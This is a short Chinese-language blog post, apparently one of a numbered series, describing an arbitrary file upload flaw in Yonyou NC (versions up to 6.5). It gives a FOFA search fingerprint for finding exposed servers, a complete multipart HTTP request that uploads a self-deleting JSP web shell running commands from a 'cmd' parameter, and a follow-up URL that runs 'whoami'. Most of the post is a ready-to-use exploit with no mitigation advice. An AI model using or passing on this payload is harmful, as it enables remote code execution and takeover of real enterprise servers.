Babing
Published on 2024-08-30 / 0 Visits
0
0

Y4-83用友-NC-任意文件上传

Y4-83用友-NC-任意文件上传

漏洞描述:

用友 NC uploadControl/uploadFile 接口处存在任意文件上传漏洞,攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。

影响版本:

用友网络科技股份有限公司-NCversion<=6.5受影响

网站图片:

image-20240623123855623

fofa语法:

icon_hash=“1085941792”

漏洞复现:

payload:

POST /mp/initcfg//uploadControl/uploadFile HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,like Gecko) Chrome/94.0.2687.94 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHHaZAYecVOf5sfa6
Connection: close

------WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="file"; filename="rce.jsp"
Content-Type: image/jpeg

<% java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("cmd")).getInputStream();int a = -1;byte[] b = new byte[2048];out.print("<pre>");while((a=in.read(b))!=-1){out.println(new String(b,0,a));}out.print("</pre>");new java.io.File(application.getRealPath(request.getServletPath())).delete();%>
------WebKitFormBoundaryHHaZAYecVOf5sfa6
Content-Disposition: form-data; name="submit"

上传
------WebKitFormBoundaryHHaZAYecVOf5sfa6--

效果图:
效果图
验证url
payload:

/mp/uploadFileDir/rce.jsp?cmd=whoami

效果图:
效果图


Comment